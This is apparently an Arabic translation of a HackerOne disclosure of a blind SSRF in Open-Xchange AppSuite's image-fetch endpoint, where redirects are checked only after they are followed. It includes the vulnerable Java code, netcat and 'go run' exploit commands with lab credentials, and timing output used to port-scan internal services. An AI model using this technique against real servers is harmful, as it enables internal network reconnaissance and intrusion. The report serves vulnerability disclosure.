
https://hackerone.com/reports/865652
المنطق في AddFileAction.getImageDataFromUrl لجلب الصور من عناوين URL خارجية عند معالجة /appsuite/api/oxodocumentfilter&action=addfile المنفذ هنا يتحقق من عناوين URL المعاد توجيهها فقط بعد اتباع جميع عمليات إعادة التوجيه
response = httpClient.execute(getRequest, context);
int statusCode = response.getStatusLine().getStatusCode();
if (statusCode == HttpStatus.SC_OK) {
List<URI> locations = context.getRedirectLocations();
if (locations != null) {
for (URI uri : locations) {
try {
Optional<OXException> oxException = validator.apply(uri.toURL());
if (oxException.isPresent()) {
throw (RESTException) oxException.get().getCause();
}
} catch (MalformedURLException e) {
throw new RESTException(ErrorCode.GENERAL_ARGUMENTS_ERROR, e);
}
};
}
long length = response.getEntity().getContentLength();
...
}
قد يستخدم المهاجم هذا لتنفيذ هجمات SSRF عمياء.
127.0.0.1:7070
nc -l 127.0.0.1 -p 7070
go run . -redirectorAddress="172.16.146.1:8081" -targetPorts="7070" -serverRoot="http://172.16.66.130" -username="testuser" -password="secret"
سيؤدي تشغيل الأمر أعلاه إلى عرض المخرجات التالية في netcat
GET /image.png HTTP/1.1
Accept: *
Accept-Encoding: gzip
Host: 127.0.0.1:7070
Connection: Keep-Alive
User-Agent: Open-Xchange Image Url Data Fetcher
بما أن هذه ثغرة SSRF عمياء، فليس من الممكن قراءة استجابة طلبات HTTP. ومع ذلك، يمكن استخدام هذه الثغرة لأغراض الاستطلاع.
لتشغيل فحص منافذ على المنافذ 7070,61616,8004,80,22,25,8080,3125 على الشبكة المحلية للخادم، نفّذ الأمر التالي
go run . -redirectorAddress="172.16.146.1:8081" -targetPorts="7070,61616,8004,80,22,8080,3125" -serverRoot="http://172.16.66.130" -username="testuser" -password="secret" -numSamples=20
المخرجات:
2020/05/04 13:32:42 7070: 2.220000
2020/05/04 13:32:42 61616: 3567.000000
2020/05/04 13:32:42 8004: 2.980000
2020/05/04 13:32:42 80: 3.180000
2020/05/04 13:32:42 22: 34.600000
2020/05/04 13:32:42 25: 2169.333333
2020/05/04 13:32:42 8080: 2.560000
2020/05/04 13:32:42 3125: 3.000000
يمكننا استخدام lsof لرؤية المنافذ المفتوحة داخل الجهاز الافتراضي
sudo lsof -nP -iTCP -sTCP:LISTEN
المخرجات:
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
java 467 open-xchange 15u IPv6 13049 0t0 TCP 172.16.66.130:9994 (LISTEN)
java 467 open-xchange 16u IPv6 15970 0t0 TCP *:42319 (LISTEN)
java 467 open-xchange 24u IPv6 14136 0t0 TCP 127.0.0.1:61616 (LISTEN)
java 467 open-xchange 33u IPv6 16419 0t0 TCP *:8004 (LISTEN)
java 489 open-xchange 37u IPv6 14138 0t0 TCP 127.0.0.1:9999 (LISTEN)
java 489 open-xchange 42u IPv6 17565 0t0 TCP 127.0.0.1:1099 (LISTEN)
java 489 open-xchange 47u IPv6 14144 0t0 TCP 127.0.0.1:5701 (LISTEN)
java 489 open-xchange 127u IPv6 15345 0t0 TCP *:36149 (LISTEN)
java 489 open-xchange 144u IPv6 17559 0t0 TCP 127.0.0.1:8009 (LISTEN)
apache2 526 root 3u IPv6 13789 0t0 TCP *:80 (LISTEN)
apache2 527 www-data 3u IPv6 13789 0t0 TCP *:80 (LISTEN)
apache2 528 www-data 3u IPv6 13789 0t0 TCP *:80 (LISTEN)
mysqld 695 mysql 26u IPv4 13847 0t0 TCP 127.0.0.1:3306 (LISTEN)
exim4 1077 Debian-exim 3u IPv4 13115 0t0 TCP 127.0.0.1:25 (LISTEN)
exim4 1077 Debian-exim 4u IPv6 13116 0t0 TCP [::1]:25 (LISTEN)
sshd 1345 root 3u IPv4 14259 0t0 TCP 172.16.66.130:22 (LISTEN)
sshd 1345 root 4u IPv4 14261 0t0 TCP 127.0.0.1:22 (LISTEN)
من المخرجات أعلاه، يمكن استخلاص الملاحظات التالية:
لذلك يمكن للمهاجم استخدام هذه الثغرة لاكتشاف معظم المنافذ المفتوحة، ويمكنه استخدام زمن الاستجابة لتحديد نوع الاتصال (ssh / exim / activemq وما إلى ذلك).